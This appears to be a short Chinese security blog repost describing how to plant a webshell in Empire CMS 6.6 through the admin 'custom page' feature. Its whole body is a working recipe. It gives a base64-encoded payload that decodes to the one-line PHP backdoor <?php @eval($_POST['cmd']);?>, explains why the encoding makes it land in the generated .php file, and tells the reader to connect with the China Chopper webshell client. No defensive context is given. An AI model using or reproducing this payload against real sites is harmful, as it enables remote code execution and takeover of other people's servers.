帝国cms 6.6漏洞

颓废 2019年5月19日10:01:49评论759 views字数 307阅读1分1秒阅读模式
摘要

自定义页面-增加自定义页面-随便写个.php文件名,内容写:<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>

自定义页面-增加自定义页面-随便写个.php文件名,内容写:<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=");</script>

如果内容直接添一句话或者php大马是无用的,因为他会生成xxx.php前先给你执行,

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=  就是 <?php @eval($_POST['cmd']);?> 的base64加密。

所以生成xxx.php后 会出现内容 <?php @eval($_POST['cmd']);?> 在文件里,然后用菜刀直接连接吧。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:01:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   帝国cms 6.6漏洞https://cn-sec.com/archives/67363.html

发表评论

匿名网友 填写信息